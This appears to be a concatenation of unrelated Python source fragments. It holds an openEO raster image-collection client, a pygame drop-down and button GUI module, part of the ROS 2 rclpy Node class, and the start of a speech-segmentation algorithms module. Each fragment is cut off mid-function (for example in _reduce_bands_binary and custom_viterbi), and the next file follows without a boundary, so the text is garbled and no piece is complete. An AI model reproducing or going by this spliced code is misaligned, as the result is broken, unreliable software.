"""
def __init__(self, node_id: str, builder: GraphBuilder, session: 'Connection', metadata: CollectionMetadata = None):
self.node_id = node_id
self.builder= builder
self.session = session
self.graph = builder.processes
self.metadata = CollectionMetadata.get_or_create(metadata)
def __str__(self):
return "ImageCollection: %s" % self.node_id
@property
def _api_version(self):
return self.session.capabilities().api_version_check
@property
def connection(self):
return self.session
@classmethod
def load_collection(
cls, collection_id: str, session: 'Connection' = None,
spatial_extent: Union[Dict[str, float], None] = None,
temporal_extent: Union[List[Union[str,datetime.datetime,datetime.date]], None] = None,
bands: Union[List[str], None] = None,
fetch_metadata=True
):
"""
Create a new Image Collection/Raster Data cube.
:param collection_id: A collection id, should exist in the backend.
:param session: The session to use to connect with the backend.
:param spatial_extent: limit data to specified bounding box or polygons
:param temporal_extent: limit data to specified temporal interval
:param bands: only add the specified bands
:return:
"""
# TODO: rename function to load_collection for better similarity with corresponding process id?
builder = GraphBuilder()
process_id = 'load_collection'
normalized_temporal_extent = list(get_temporal_extent(extent=temporal_extent)) if temporal_extent is not None else None
arguments = {
'id': collection_id,
'spatial_extent': spatial_extent,
'temporal_extent': normalized_temporal_extent,
}
metadata = session.collection_metadata(collection_id) if fetch_metadata else None
if bands:
if isinstance(bands, str):
bands = [bands]
if metadata:
bands = [metadata.band_dimension.band_name(b, allow_common=False) for b in bands]
arguments['bands'] = bands
node_id = builder.process(process_id, arguments)
if bands:
metadata = metadata.filter_bands(bands)
return cls(node_id, builder, session, metadata=metadata)
create_collection = legacy_alias(load_collection, "create_collection")
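    # Illustrative sketch of typical usage; the collection id, extents and band
    # names below are hypothetical and backend-dependent, and `connection` is an
    # already-opened openeo Connection:
    #
    #   cube = ImageCollectionClient.load_collection(
    #       "SENTINEL2_L2A",
    #       session=connection,
    #       spatial_extent={"west": 4.0, "south": 51.0, "east": 4.1, "north": 51.1},
    #       temporal_extent=["2020-01-01", "2020-02-01"],
    #       bands=["B04", "B08"],
    #   )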
@classmethod
def load_disk_collection(cls, session: 'Connection', file_format: str, glob_pattern: str, **options) -> 'ImageCollection':
"""
Loads image data from disk as an ImageCollection.
:param session: The session to use to connect with the backend.
:param file_format: the file format, e.g. 'GTiff'
:param glob_pattern: a glob pattern that matches the files to load from disk
:param options: options specific to the file format
:return: the data as an ImageCollection
"""
builder = GraphBuilder()
process_id = 'load_disk_data'
arguments = {
'format': file_format,
'glob_pattern': glob_pattern,
'options': options
}
node_id = builder.process(process_id, arguments)
return cls(node_id, builder, session, metadata={})
def _filter_temporal(self, start: str, end: str) -> 'ImageCollection':
return self.graph_add_process(
process_id='filter_temporal',
args={
'data': {'from_node': self.node_id},
'extent': [start, end]
}
)
def filter_bbox(self, west, east, north, south, crs=None, base=None, height=None) -> 'ImageCollection':
extent = {'west': west, 'east': east, 'north': north, 'south': south}
extent.update(dict_no_none(crs=crs, base=base, height=height))
return self.graph_add_process(
process_id='filter_bbox',
args={
'data': {'from_node': self.node_id},
'extent': extent
}
)
def filter_bands(self, bands: Union[List[Union[str, int]], str]) -> 'ImageCollection':
"""
Filter the imagery by the given bands
:param bands: list of band names, common names or band indices. Single band name can also be given as string.
        :return: an ImageCollection instance
"""
if isinstance(bands, str):
bands = [bands]
bands = [self.metadata.band_dimension.band_name(b) for b in bands]
im = self.graph_add_process(
process_id='filter_bands',
args={
'data': {'from_node': self.node_id},
'bands': [b for b in bands if b in self.metadata.band_names],
'common_names': [b for b in bands if b in self.metadata.band_common_names]
})
if im.metadata:
im.metadata = im.metadata.filter_bands(bands)
return im
band_filter = legacy_alias(filter_bands, "band_filter")
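    # Illustrative sketch of band filtering and band math (band names are
    # hypothetical and depend on the collection's metadata):
    #
    #   cube_rn = cube.filter_bands(["B04", "B08"])
    #   red = cube_rn.band("B04")
    #   nir = cube_rn.band("B08")
    #   ndvi = (nir - red) / (nir + red)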
def band(self, band: Union[str, int]) -> 'ImageCollection':
"""Filter the imagery by the given bands
:param band: band name, band common name or band index.
:return An ImageCollection instance
"""
process_id = 'reduce'
band_index = self.metadata.get_band_index(band)
args = {
'data': {'from_node': self.node_id},
'dimension': self.metadata.band_dimension.name,
'reducer': {
'callback': {
'r1': {
'arguments': {
'data': {
'from_argument': 'data'
},
'index': band_index
},
'process_id': 'array_element',
'result': True
}
}
}
}
return self.graph_add_process(process_id, args)
def resample_spatial(self, resolution: Union[float, Tuple[float, float]],
projection: Union[int, str] = None, method: str = 'near', align: str = 'upper-left'):
return self.graph_add_process('resample_spatial', {
'data': {'from_node': self.node_id},
'resolution': resolution,
'projection': projection,
'method': method,
'align': align
})
def subtract(self, other:Union[ImageCollection,Union[int,float]]):
"""
Subtract other from this datacube, so the result is: this - other
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this - other
"""
operator = "subtract"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def divide(self, other:Union[ImageCollection,Union[int,float]]):
"""
        Divide this datacube by other, so the result is: this / other
        The number of bands in both data cubes has to be the same.
        :param other:
        :return ImageCollection: this / other
"""
operator = "divide"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def product(self, other:Union[ImageCollection,Union[int,float]]):
"""
Multiply other with this datacube, so the result is: this * other
The number of bands in both data cubes has to be the same.
:param other:
        :return ImageCollection: this * other
"""
operator = "product"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def logical_or(self, other: ImageCollection):
"""
Apply element-wise logical `or` operation
:param other:
:return ImageCollection: logical_or(this, other)
"""
return self._reduce_bands_binary(operator='or', other=other,arg_name='expressions')
def logical_and(self, other: ImageCollection):
"""
Apply element-wise logical `and` operation
:param other:
:return ImageCollection: logical_and(this, other)
"""
return self._reduce_bands_binary(operator='and', other=other,arg_name='expressions')
def __invert__(self):
"""
:return:
"""
operator = 'not'
my_builder = self._get_band_graph_builder()
new_builder = None
extend_previous_callback_graph = my_builder is not None
# TODO: why does these `add_process` calls use "expression" instead of "data" like the other cases?
if not extend_previous_callback_graph:
new_builder = GraphBuilder()
# TODO merge both process graphs?
new_builder.add_process(operator, expression={'from_argument': 'data'}, result=True)
else:
new_builder = my_builder.copy()
current_result = new_builder.find_result_node_id()
new_builder.processes[current_result]['result'] = False
new_builder.add_process(operator, expression={'from_node': current_result}, result=True)
return self._create_reduced_collection(new_builder, extend_previous_callback_graph)
def __ne__(self, other: Union[ImageCollection, Union[int, float]]):
return self._reduce_bands_binary_xy('neq', other)
def __eq__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pixelwise comparison of this data cube with another cube or constant.
:param other: Another data cube, or a constant
:return:
"""
return self._reduce_bands_binary_xy('eq', other)
def __gt__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise comparison of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
        :return ImageCollection: this > other
"""
return self._reduce_bands_binary_xy('gt', other)
def __ge__(self, other:Union[ImageCollection,Union[int,float]]):
return self._reduce_bands_binary_xy('gte', other)
def __lt__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise comparison of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
        :return ImageCollection: this < other
"""
return self._reduce_bands_binary_xy('lt', other)
def __le__(self, other:Union[ImageCollection,Union[int,float]]):
return self._reduce_bands_binary_xy('lte',other)
def _create_reduced_collection(self, callback_graph_builder, extend_previous_callback_graph):
if not extend_previous_callback_graph:
# there was no previous reduce step
args = {
'data': {'from_node': self.node_id},
'dimension': self.metadata.band_dimension.name,
'reducer': {
'callback': callback_graph_builder.processes
}
}
return self.graph_add_process("reduce", args)
else:
process_graph_copy = self.builder.shallow_copy()
process_graph_copy.processes[self.node_id]['arguments']['reducer']['callback'] = callback_graph_builder.processes
# now current_node should be a reduce node, let's modify it
# TODO: properly update metadata of reduced cube? #metadatareducedimension
return ImageCollectionClient(self.node_id, process_graph_copy, self.session, metadata=self.metadata)
def __truediv__(self, other):
return self.divide(other)
def __sub__(self, other):
return self.subtract(other)
def __radd__(self, other):
return self.add(other)
def __add__(self, other):
return self.add(other)
def __neg__(self):
return self.product(-1)
def __mul__(self, other):
return self.product(other)
def __rmul__(self, other):
return self.product(other)
def __or__(self, other):
return self.logical_or(other)
def __and__(self, other):
return self.logical_and(other)
def add(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise addition of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this + other
"""
operator = "sum"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def _reduce_bands_binary(self, operator, other: 'ImageCollectionClient',arg_name='data'):
# first we create the callback
my_builder = self._get_band_graph_builder()
other_builder = other._get_band_graph_builder()
merged = GraphBuilder.combine(
operator=operator,
first=my_builder or {'from_argument': 'data'},
            second=other_builder or {'from_argument': 'data'},
            arg_name=arg_name)
<filename>dan_gui.py
import pygame
import math
# RGB colour definitions for referring to later
black = (0, 0, 0)
white = (255, 255, 255)
grey = (100, 100, 100)
darkGrey = (50, 50, 50)
light_grey = (130, 130, 130)
# Base/parent class used for all other classes
# Should be treated as abstract - there should never be an Element object, only objects that are children of Element
class Element:
# x, y = the x and y position of the top left of the element in pixels
# width, height = width + height of the element in pixels
# font = The Pygame Font object used for rendering text
# bg_colour = The colour of background parts of the element as an RGB tuple
# text_colour = The colour of text of the element as an RGB tuple
def __init__(self, x, y, width, height, font, back_colour=grey, text_colour=black):
# x and y can be a decimal value as these are not the values used in drawing
self.x = x
self.y = y
self.width = width
self.height = height
# Pygame Rect object that covers the entire object, used for collision detection with mouse
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
# x2 and y2 are the co-ords for the bottom right of the element
self.x2 = self.x + self.width
self.y2 = self.y + self.height
self.font = font
self.bg_colour = back_colour
self.text_colour = text_colour
@property
def bg_colour(self):
return self._bg_colour
# Validation check before setting background colour to new value
    # Prevents a crash due to an invalid colour where one component is greater than 255 or less than 0
@bg_colour.setter
def bg_colour(self, new_colour):
valid = True
for n in new_colour:
if n > 255 or n < 0:
valid = False
if valid:
self._bg_colour = new_colour
# Default methods, child classes override the ones they need
# Uses 'pass' keyword: method does nothing
# Default draw method
# Parameter screen is a Pygame surface object that will be drawn to
def draw(self, screen):
pass
# Method that deals with clicking input, takes in the mouse position as 2 co-ords
def on_click(self, mouse_x, mouse_y):
pass
# Method that deals with mouse button being released
def on_unclick(self):
pass
# Method that deals with a keyboard key being pressed
# Takes in the pygame key code as a parameter
def on_char_typed(self, key_pressed):
pass
# Method that deals with a keyboard key being released
# Takes in the pygame key code as a parameter
def on_key_up(self, key_up):
pass
# Method for things that should be run once a frame
# Takes in the mouse pos as 2 co-ords as parameters
def update(self, mouse_x, mouse_y):
pass
# Method that is called when an Element object is added to a Menu or Group object
    # For explanation, see the methods where overridden
def on_menu_add(self):
pass
# Class for a drop-down list that displays a list of pre-defined options
# Inherits all methods and attributes from Element
class DropDown(Element):
# Static constant for how wide the button at the side of the list should be
buttonWidth = 30
# data = A list of possible options - strings
# font = The pygame Font object used to render text
def __init__(self, x, y, width, height, data, font):
# Calls its parent's init method to get all parent attributes
Element.__init__(self, x, y, width, height, font)
self.bg_colour = light_grey
self.data = data
self.current_opt = 0
self.button_text = self.font.render(self.data[self.current_opt], 1, black)
# Make text objects for all data objects
self.options = data
# Open is a boolean that tracks whether the list should be drawn
self.open = False
# Pygame Rect object that covers the button
self.button_rect = pygame.Rect(self.x2, self.y, DropDown.buttonWidth, self.height)
# Pygame Rect object that covers the menu
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height*len(self.data))
def on_menu_add(self):
self.button_rect = pygame.Rect(self.x2, self.y, DropDown.buttonWidth, self.height)
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height*len(self.data))
def on_click(self, mouse_x, mouse_y):
# Returns true if an option changed
changed = False
# Checks if the menu is open
if self.open:
# Checks if clicking button
if self.button_rect.collidepoint(mouse_x, mouse_y):
# Closes the drop down menu
self.open = False
# If clicking the menu, select the option they clicked on, then close the menu
if self.menu_rect.collidepoint(mouse_x, mouse_y):
self.select_option(mouse_y)
self.open = False
# Option has been changed
changed = True
else:
# Checks if clicking button
if self.button_rect.collidepoint(mouse_x, mouse_y):
# Open the drop down menu
self.open = True
return changed
# Using property modifier for getter and setter
@property
def options(self):
return self.__options
# Uses setter to make sure when options change, text objects are automatically created
# Takes in a list of strings as a parameter
@options.setter
def options(self, data):
options = []
# For each string in data, make a text object from it
for i in range(len(data)):
text = self.font.render(data[i], 1, black)
options.append(text)
self.__options = options
# Recreates the collision Rect object to account for longer menu box
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height * (len(self.data)))
# Takes in the y co-ord of the mouse
# Subtracts from the y co-ord so the top of the first option box is at 0
# Divides by the height of each option box then rounds it down
def select_option(self, mouse_y):
self.current_opt = math.floor((mouse_y - self.y - self.height) / self.height)
# Changes the button text to the currently selected option
self.change_text(self.data[self.current_opt])
# Changes the text in the button to string new_text
def change_text(self, new_text):
self.button_text = self.font.render(new_text, 1, black)
# Draws the drop-down box
def draw(self, screen):
# Draws the background of the box
pygame.draw.rect(screen, self.bg_colour, (self.x, self.y, self.width, self.height))
# Draws the background for the button next to the box
pygame.draw.rect(screen, darkGrey, ((self.x + self.width), self.y, DropDown.buttonWidth, self.height))
# Draws the triangle inside the button
pygame.draw.polygon(screen, black, (((self.x + self.width + (DropDown.buttonWidth / 2)),
(self.y + self.height - 3)), ((self.x + self.width + 3), (self.y + 3)),
((self.x2 + DropDown.buttonWidth - 3), (self.y + 3))))
# Draw text in box
screen.blit(self.button_text, (self.x + 2, self.y + 2))
# Draw border around box
pygame.draw.lines(screen, black, True, ((self.x, self.y), (self.x2, self.y), (self.x2, self.y2), (self.x, self.y2)))
# Displays whole list if open
if self.open:
# For each option available, draw a box with text in
for i in range(len(self.data)):
current_y = self.y + ((i+1)*self.height)
# Render a box
pygame.draw.rect(screen, self.bg_colour, (self.x, current_y, self.width, self.height))
# Render the text
screen.blit(self.options[i], (self.x + 2, current_y + 2))
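# Illustrative sketch of driving a DropDown from a pygame event loop (the
# window size, font and option strings below are hypothetical):
#
#   pygame.init()
#   screen = pygame.display.set_mode((400, 300))
#   font = pygame.font.SysFont(None, 24)
#   dropdown = DropDown(20, 20, 150, 30, ["Option A", "Option B"], font)
#   for event in pygame.event.get():
#       if event.type == pygame.MOUSEBUTTONDOWN:
#           changed = dropdown.on_click(*event.pos)  # True when the selection changed
#   dropdown.draw(screen)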
# Class for a button with a text label
# Inherits all methods and attributes from Element
class Button(Element):
# text = The text rendered as the button's label
def __init__(self, x, y, font, text):
self.text = text
# Width and Height are generated based on the width and height of the text
self.width = font.size(text)[0] + 5
self.height = font.size(text)[1] + 5
Element.__init__(self, x, y, self.width, self.height, font)
self.bg_colour = light_grey
# Makes a text object of the label text
self.txt_obj = self.font.render(self.text, 1, self.text_colour)
# Clicked is a boolean value which is true when the user has clicked on the button
self.clicked = False
# The number of frames since the button was last clicked
self.last_click = 0
# The width of the black border around the button in pixels
self.border = 1
# When this is true, the button appears greyed out and cannot be clicked
self.grey = False
# Using getters and setters for attribute 'grey'
@property
def grey(self):
return self._grey
    # When grey is changed, the button's colours are refreshed via update_grey()
    # The part of update that deals with colour should only be run once, not on every update
@grey.setter
def grey(self, new_grey):
self._grey = new_grey
self.update_grey()
# When mouse button released, clicked = false
def on_unclick(self):
self.clicked = False
# When mouse clicked, checks if mouse is inside button
# Checks if button has not been pressed in last 20 frames
# Checks if button is not greyed out
    # If all True, the button registers the click
# Copyright 2016 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typing import Any
from typing import Callable
from typing import Dict
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import TypeVar
from typing import Union
import weakref
from rcl_interfaces.msg import FloatingPointRange
from rcl_interfaces.msg import IntegerRange
from rcl_interfaces.msg import Parameter as ParameterMsg
from rcl_interfaces.msg import ParameterDescriptor
from rcl_interfaces.msg import ParameterEvent
from rcl_interfaces.msg import ParameterValue
from rcl_interfaces.msg import SetParametersResult
from rclpy.callback_groups import CallbackGroup
from rclpy.callback_groups import MutuallyExclusiveCallbackGroup
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.client import Client
from rclpy.clock import Clock
from rclpy.clock import ROSClock
from rclpy.constants import S_TO_NS
from rclpy.context import Context
from rclpy.exceptions import InvalidParameterValueException
from rclpy.exceptions import NotInitializedException
from rclpy.exceptions import ParameterAlreadyDeclaredException
from rclpy.exceptions import ParameterImmutableException
from rclpy.exceptions import ParameterNotDeclaredException
from rclpy.executors import Executor
from rclpy.expand_topic_name import expand_topic_name
from rclpy.guard_condition import GuardCondition
from rclpy.handle import Handle
from rclpy.handle import InvalidHandle
from rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy
from rclpy.logging import get_logger
from rclpy.parameter import Parameter, PARAMETER_SEPARATOR_STRING
from rclpy.parameter_service import ParameterService
from rclpy.publisher import Publisher
from rclpy.qos import qos_profile_parameter_events
from rclpy.qos import qos_profile_services_default
from rclpy.qos import QoSProfile
from rclpy.qos_event import PublisherEventCallbacks
from rclpy.qos_event import SubscriptionEventCallbacks
from rclpy.service import Service
from rclpy.subscription import Subscription
from rclpy.time_source import TimeSource
from rclpy.timer import Rate
from rclpy.timer import Timer
from rclpy.type_support import check_for_type_support
from rclpy.utilities import get_default_context
from rclpy.validate_full_topic_name import validate_full_topic_name
from rclpy.validate_namespace import validate_namespace
from rclpy.validate_node_name import validate_node_name
from rclpy.validate_parameter_name import validate_parameter_name
from rclpy.validate_topic_name import validate_topic_name
from rclpy.waitable import Waitable
HIDDEN_NODE_PREFIX = '_'
# Used for documentation purposes only
MsgType = TypeVar('MsgType')
SrvType = TypeVar('SrvType')
SrvTypeRequest = TypeVar('SrvTypeRequest')
SrvTypeResponse = TypeVar('SrvTypeResponse')
# Re-export exception defined in _rclpy C extension.
# `Node.get_*_names_and_types_by_node` methods may raise this error.
NodeNameNonExistentError = _rclpy.NodeNameNonExistentError
class Node:
    """
    A Node in the ROS graph.
    A Node is the primary entrypoint in a ROS system for communication.
    It can be used to create ROS entities such as publishers, subscribers, services, etc.
    """
    PARAM_REL_TOL = 1e-6
def __init__(
self,
node_name: str,
*,
context: Context = None,
cli_args: List[str] = None,
namespace: str = None,
use_global_arguments: bool = True,
enable_rosout: bool = True,
start_parameter_services: bool = True,
parameter_overrides: List[Parameter] = None,
allow_undeclared_parameters: bool = False,
automatically_declare_parameters_from_overrides: bool = False
) -> None:
"""
Create a Node.
:param node_name: A name to give to this node. Validated by :func:`validate_node_name`.
:param context: The context to be associated with, or ``None`` for the default global
context.
:param cli_args: A list of strings of command line args to be used only by this node.
These arguments are used to extract remappings used by the node and other ROS specific
settings, as well as user defined non-ROS arguments.
:param namespace: The namespace to which relative topic and service names will be prefixed.
Validated by :func:`validate_namespace`.
:param use_global_arguments: ``False`` if the node should ignore process-wide command line
args.
:param enable_rosout: ``False`` if the node should ignore rosout logging.
:param start_parameter_services: ``False`` if the node should not create parameter
services.
:param parameter_overrides: A list of overrides for initial values for parameters declared
on the node.
:param allow_undeclared_parameters: True if undeclared parameters are allowed.
This flag affects the behavior of parameter-related operations.
:param automatically_declare_parameters_from_overrides: If True, the "parameter overrides"
will be used to implicitly declare parameters on the node during creation.
"""
self.__handle = None
self._context = get_default_context() if context is None else context
self._parameters: dict = {}
self.__publishers: List[Publisher] = []
self.__subscriptions: List[Subscription] = []
self.__clients: List[Client] = []
self.__services: List[Service] = []
self.__timers: List[Timer] = []
self.__guards: List[GuardCondition] = []
self.__waitables: List[Waitable] = []
self._default_callback_group = MutuallyExclusiveCallbackGroup()
self._rate_group = ReentrantCallbackGroup()
self._parameters_callback = None
self._allow_undeclared_parameters = allow_undeclared_parameters
self._parameter_overrides = {}
self._descriptors = {}
namespace = namespace or ''
if not self._context.ok():
raise NotInitializedException('cannot create node')
try:
self.__handle = Handle(_rclpy.rclpy_create_node(
node_name,
namespace,
self._context.handle,
cli_args,
use_global_arguments,
enable_rosout
))
except ValueError:
# these will raise more specific errors if the name or namespace is bad
validate_node_name(node_name)
# emulate what rcl_node_init() does to accept '' and relative namespaces
if not namespace:
namespace = '/'
if not namespace.startswith('/'):
namespace = '/' + namespace
validate_namespace(namespace)
# Should not get to this point
raise RuntimeError('rclpy_create_node failed for unknown reason')
with self.handle as capsule:
self._logger = get_logger(_rclpy.rclpy_get_node_logger_name(capsule))
self.__executor_weakref = None
self._parameter_event_publisher = self.create_publisher(
ParameterEvent, 'parameter_events', qos_profile_parameter_events)
with self.handle as capsule:
self._parameter_overrides = _rclpy.rclpy_get_node_parameters(Parameter, capsule)
# Combine parameters from params files with those from the node constructor and
# use the set_parameters_atomically API so a parameter event is published.
if parameter_overrides is not None:
self._parameter_overrides.update({p.name: p for p in parameter_overrides})
if automatically_declare_parameters_from_overrides:
self._parameters.update(self._parameter_overrides)
self._descriptors.update({p: ParameterDescriptor() for p in self._parameters})
# Clock that has support for ROS time.
# Note: parameter overrides and parameter event publisher need to be ready at this point
# to be able to declare 'use_sim_time' if it was not declared yet.
self._clock = ROSClock()
self._time_source = TimeSource(node=self)
self._time_source.attach_clock(self._clock)
if start_parameter_services:
self._parameter_service = ParameterService(self)
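    # Illustrative sketch of constructing a node (the node name and namespace
    # are hypothetical); rclpy.init() must have been called first so that a
    # valid default context exists:
    #
    #   import rclpy
    #   rclpy.init()
    #   node = Node('my_node', namespace='/demo',
    #               automatically_declare_parameters_from_overrides=True)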
@property
def publishers(self) -> Iterator[Publisher]:
"""Get publishers that have been created on this node."""
yield from self.__publishers
@property
def subscriptions(self) -> Iterator[Subscription]:
"""Get subscriptions that have been created on this node."""
yield from self.__subscriptions
@property
def clients(self) -> Iterator[Client]:
"""Get clients that have been created on this node."""
yield from self.__clients
@property
def services(self) -> Iterator[Service]:
"""Get services that have been created on this node."""
yield from self.__services
@property
def timers(self) -> Iterator[Timer]:
"""Get timers that have been created on this node."""
yield from self.__timers
@property
def guards(self) -> Iterator[GuardCondition]:
"""Get guards that have been created on this node."""
yield from self.__guards
@property
def waitables(self) -> Iterator[Waitable]:
"""Get waitables that have been created on this node."""
yield from self.__waitables
@property
def executor(self) -> Optional[Executor]:
"""Get the executor if the node has been added to one, else return ``None``."""
if self.__executor_weakref:
return self.__executor_weakref()
return None
@executor.setter
def executor(self, new_executor: Executor) -> None:
"""Set or change the executor the node belongs to."""
current_executor = self.executor
if current_executor == new_executor:
return
if current_executor is not None:
current_executor.remove_node(self)
if new_executor is None:
self.__executor_weakref = None
else:
new_executor.add_node(self)
self.__executor_weakref = weakref.ref(new_executor)
def _wake_executor(self):
executor = self.executor
if executor:
executor.wake()
@property
def context(self) -> Context:
"""Get the context associated with the node."""
return self._context
@property
def default_callback_group(self) -> CallbackGroup:
"""
Get the default callback group.
        If no other callback group is provided when a ROS entity is created with the node,
then it is added to the default callback group.
"""
return self._default_callback_group
@property
def handle(self):
"""
Get the handle to the underlying `rcl_node_t`.
Cannot be modified after node creation.
:raises: AttributeError if modified after creation.
"""
return self.__handle
@handle.setter
def handle(self, value):
raise AttributeError('handle cannot be modified after node creation')
def get_name(self) -> str:
"""Get the name of the node."""
with self.handle as capsule:
return _rclpy.rclpy_get_node_name(capsule)
def get_namespace(self) -> str:
"""Get the namespace of the node."""
with self.handle as capsule:
return _rclpy.rclpy_get_node_namespace(capsule)
def get_clock(self) -> Clock:
"""Get the clock used by the node."""
return self._clock
def get_logger(self):
"""Get the nodes logger."""
return self._logger
def declare_parameter(
self,
name: str,
value: Any = None,
descriptor: ParameterDescriptor = ParameterDescriptor(),
ignore_override: bool = False
) -> Parameter:
"""
Declare and initialize a parameter.
        This method, if successful, will result in any callback registered with
        :func:`set_parameters_callback` being called.
:param name: Fully-qualified name of the parameter, including its namespace.
:param value: Value of the parameter to declare.
:param descriptor: Descriptor for the parameter to declare.
:param ignore_override: True if overrides shall not be taken into account; False otherwise.
:return: Parameter with the effectively assigned value.
:raises: ParameterAlreadyDeclaredException if the parameter had already been declared.
:raises: InvalidParameterException if the parameter name is invalid.
:raises: InvalidParameterValueException if the registered callback rejects the parameter.
"""
return self.declare_parameters('', [(name, value, descriptor)], ignore_override)[0]
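    # Illustrative sketch (the parameter name and value are hypothetical):
    #
    #   port = node.declare_parameter('port', 8080)
    #   node.get_logger().info('port: %d' % port.value)
    #
    # The returned Parameter exposes the effectively assigned value via .value.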
def declare_parameters(
self,
namespace: str,
parameters: List[Union[
Tuple[str],
Tuple[str, Any],
Tuple[str, Any, ParameterDescriptor],
]],
        ignore_override: bool = False
<reponame>kamperh/vqwordseg<filename>vqwordseg/algorithms.py
"""
VQ phone and word segmentation algorithms.
Author: <NAME>
Contact: <EMAIL>
Date: 2021
"""
from pathlib import Path
from scipy.spatial import distance
from scipy.special import factorial
from scipy.stats import gamma
from tqdm import tqdm
import numpy as np
import sys
sys.path.append(str(Path(__file__).parent/"../../dpdp_aernn"))
#-----------------------------------------------------------------------------#
# PHONE DURATION PRIORS: NEGATIVE LOG PROB (WANT TO MINIMIZE) #
#-----------------------------------------------------------------------------#
def neg_chorowski(dur, weight=None):
score = -(dur - 1)
if weight is None:
return score
else:
return -weight*score
def neg_log_poisson(dur, poisson_param=5, weight=None):
return -(
-poisson_param + dur*np.log(poisson_param) - np.log(factorial(dur))
)
histogram = np.array([
4.94283846e-05, 7.72517818e-03, 3.58084730e-02, 1.00731859e-01,
1.14922589e-01, 1.16992203e-01, 1.11386068e-01, 9.68349889e-02,
8.19379115e-02, 6.76403527e-02, 5.46630100e-02, 4.30616898e-02,
3.39445445e-02, 2.62512556e-02, 2.02767989e-02, 1.58633226e-02,
1.24495750e-02, 9.71666374e-03, 7.93086404e-03, 6.36669484e-03,
5.32550983e-03, 4.42463766e-03, 3.77887973e-03, 3.22560071e-03,
2.67072723e-03, 2.32632301e-03, 2.10469251e-03, 1.72521007e-03,
1.49560725e-03, 1.21179265e-03, 9.85378764e-04, 8.83333067e-04,
7.92448618e-04, 6.61702568e-04, 5.58062407e-04, 4.75150278e-04,
3.84265829e-04, 3.49187620e-04, 2.67869955e-04, 2.42358531e-04,
1.81768898e-04, 2.07280322e-04, 1.56257474e-04, 1.37123905e-04,
1.16395874e-04, 1.16395874e-04, 7.01564169e-05, 7.33453449e-05,
5.74007047e-05, 7.81287370e-05, 7.81287370e-05, 3.18892804e-05,
3.18892804e-05, 1.91335682e-05, 3.50782084e-05, 2.23224963e-05,
2.07280322e-05, 1.43501762e-05, 2.23224963e-05, 6.37785608e-06,
1.27557122e-05, 1.43501762e-05, 6.37785608e-06, 7.97232011e-06,
3.18892804e-06, 7.97232011e-06, 1.11612481e-05, 4.78339206e-06,
3.18892804e-06, 3.18892804e-06, 3.18892804e-06, 3.18892804e-06
])
histogram = histogram/np.sum(histogram)
def neg_log_hist(dur, weight=None):
score = -np.log(0 if dur >= len(histogram) else histogram[dur])
if weight is None:
return score
else:
return weight*(score) + np.log(np.sum(histogram**weight))
# Cache Gamma
# shape, loc, scale = (3, 0, 2.6)
shape, loc, scale = (3, 0, 2.5)
gamma_cache = []
for dur in range(200):
gamma_cache.append(gamma.pdf(dur, shape, loc, scale))
def neg_log_gamma(dur, weight=None):
# (
# 2.967152765811849, -0.004979890790653328, 2.6549778308011014
# )
if dur < 200:
score = -np.log(gamma_cache[dur])
else:
score = -np.log(gamma.pdf(dur, shape, loc, scale))
if weight is None:
return score
else:
        # gamma_cache is a plain list, so convert it before exponentiation
        return weight*score + np.log(np.sum(np.array(gamma_cache)**weight))
#-----------------------------------------------------------------------------#
# DYNAMIC PROGRAMMING PENALIZED SEGMENTATION #
#-----------------------------------------------------------------------------#
def get_segment_intervals(n_total, n_max_frames):
indices = [None]*int((n_total**2 + n_total)/2)
for cur_start in range(n_total):
for cur_end in range(cur_start, min(n_total, cur_start +
n_max_frames)):
cur_end += 1
t = cur_end
i = int(t*(t - 1)/2)
indices[i + cur_start] = (cur_start, cur_end)
return indices
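# Illustrative sketch: for n_total=3 and n_max_frames=3 the intervals are laid
# out triangularly, with interval (start, end) stored at i = end*(end - 1)/2 + start:
#
#   get_segment_intervals(3, 3)
#   # -> [(0, 1), (0, 2), (1, 2), (0, 3), (1, 3), (2, 3)]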
def custom_viterbi(costs, n_frames):
"""
Viterbi segmentation of an utterance of length `n_frames` based on `costs`.
Parameters
----------
costs : n_frames*(n_frames + 1)/2 vector
For t = 1, 2, ..., N the entries costs[i:i + t] contains the costs of
seq[0:t] up to seq[t - 1:t], with i = t(t - 1)/2. Written out: costs =
[cost(seq[0:1]), cost(seq[0:2]), cost(seq[1:2]), cost(seq[0:3]), ...,
cost(seq[N-1:N])].
Return
------
(summed_cost, boundaries) : (float, vector of bool)
"""
# Initialise
